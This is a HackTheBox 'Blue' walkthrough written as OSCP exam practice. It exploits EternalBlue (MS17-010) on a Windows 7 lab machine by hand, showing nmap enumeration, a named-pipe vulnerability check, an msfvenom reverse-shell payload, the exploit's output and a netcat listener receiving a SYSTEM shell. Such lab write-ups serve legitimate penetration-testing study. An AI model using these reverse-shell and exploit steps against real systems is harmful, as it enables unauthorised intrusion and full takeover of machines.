TJ_Null’s OSCP Prep – HTB – Blue

This Windows 7 box was vulnerable to Eternalblue or MS17-010. Using metasploit, it would be done in about 10 minutes. But since Im not using metasploit I did it manually. I had a lot of trouble getting the exploit to work because I required named pipes. There is a module in Metasploit which would enumerate it for you, but I didnt use it. However, I used helviojunior‘s script, which is a modified version of worawit’s


As always I’ll start with an NMAP scan.

└─# nmap -sC -sV -p- --min-rate 10000 -oN nmpa.result                                                                                                                                                                     130 ⨯
Starting Nmap 7.92 ( ) at 2022-01-07 16:40 EST
Warning: giving up on port because retransmission cap hit (10).
Stats: 0:00:58 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 16:43 (0:01:26 remaining)
Nmap scan report for
Host is up (0.039s latency).
Not shown: 65506 closed tcp ports (reset)
135/tcp   open     msrpc          Microsoft Windows RPC
139/tcp   open     netbios-ssn    Microsoft Windows netbios-ssn
308/tcp   filtered novastorbakcup
445/tcp   open     microsoft-ds   Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3432/tcp  filtered osdcp
3932/tcp  filtered dyn-site
4090/tcp  filtered omasgport
6847/tcp  filtered unknown
8986/tcp  filtered unknown
13231/tcp filtered unknown
14275/tcp filtered unknown
23124/tcp filtered unknown
23259/tcp filtered unknown
35388/tcp filtered unknown
41346/tcp filtered unknown
41964/tcp filtered unknown
44930/tcp filtered unknown
49152/tcp open     msrpc          Microsoft Windows RPC
49153/tcp open     msrpc          Microsoft Windows RPC
49154/tcp open     msrpc          Microsoft Windows RPC
49155/tcp open     msrpc          Microsoft Windows RPC
49156/tcp open     msrpc          Microsoft Windows RPC
49157/tcp open     msrpc          Microsoft Windows RPC
54785/tcp filtered unknown
55262/tcp filtered unknown
56807/tcp filtered unknown
61099/tcp filtered unknown
63728/tcp filtered unknown
64473/tcp filtered unknown
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-01-07T21:43:51
|_  start_date: 2022-01-07T21:39:56
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-01-07T21:43:49+00:00
|_clock-skew: mean: 1m53s, deviation: 0s, median: 1m52s

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 83.10 seconds

The OS is Windows 7 Professional 7601 Service Pack 1.

There are many ports open, but since the machine name is Blue, I got a hint that this might be eternalblue vulnerability.

EternalBlue[5] is a cyberattack exploit developed by the U.S. National Security Agency (NSA).[6] It was leaked by the Shadow Brokers hacker group on April 14, 2017, one month after Microsoft released patches for the vulnerability. […]

EternalBlue exploits a vulnerability in Microsoft‘s implementation of the Server Message Block (SMB) protocol.

To verify that the machine is actually vulnerable to eternalblue, I did some enumeration.

Eternalblue enum

└─# nmap --script vuln      
Starting Nmap 7.92 ( ) at 2022-01-17 14:19 EST

Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010: 
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|     Disclosure date: 2017-03-14
|     References:

Nmap done: 1 IP address (1 host up) scanned in 137.69 seconds

And using in helviojuniors github to check if target is vulnerable. If it returns anything else other than 0xC0000205 (Which means STATUS_INSUFF_SERVER_RESOURCES) it will say that The target is patched.

└─# python2                                                                                                                                                       1 ⨯
Trying to connect to
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===

Notice how Testing named pipes returns STATUS_ACCESS_DENIED. Thats because we havent used a username to authenticate. If I input anything into USERNAME, it will authenticate.

And if I run the script now.

└─# python2 
Trying to connect to
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)

Alrite, now we have established that the target is vulnerable. Now its time to exploit the vulnerability.

Initial Access

Let’s first take a look at the script What happens here is that it takes lfile, which is sys.argv[2]. Example (python2 exploit.exe). exploit.exe would be the lfile that is going to be executed on the target machine.

It will execute it as a service using service_exec.

So first, lets add a USERNAME in the script. As we did with the script, I’ll just add useruser as USERNAME variable.

Then I’ll create a payload using msfvenom.

└─# msfvenom -p windows/shell_reverse_tcp -f exe LHOST= LPORT=4444 > exploit.exe

Start a rlwrap netcat listener and execute the script.

└─# python2 exploit.exe
Trying to connect to
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: browser
Target is 64 bit
Got frag size: 0x10
CONNECTION: 0xfffffa80045836c0
SESSION: 0xfffff8a001608660
FLINK: 0xfffff8a00866b088
InParam: 0xfffff8a00862d15c
MID: 0x2103
unexpected alignment, diff: 0x3d088
leak failed... try again
CONNECTION: 0xfffffa80045836c0
SESSION: 0xfffff8a001608660
FLINK: 0xfffff8a008677088
InParam: 0xfffff8a00867115c
MID: 0x2203
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Sending file 0P0GY6.exe...
Opening SVCManager on
Creating service dVJG.....
Starting service dVJG.....
The NETBIOS connection with the remote host timed out.
Removing service dVJG.....
ServiceExec Error on:
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

nt authority\system


And just like that, we are NT AUTHORITY\SYSTEM. As you read from the output for, it opens SVCManager, creates a service, and start the service. If the service exist, it will remote it.

What I’ve learned

  • Scripts will usually not work right out of the box. I have to understand how the exploit and the scripts works, and sometimes modify it for it to work.
  • Even though the same vulnerability exist in XP and other OS, the way its exploited is different from each other. For example, in on the box Legacy the account used SMB was <blank>, meaning we didnt have to specify a username.

Similar Posts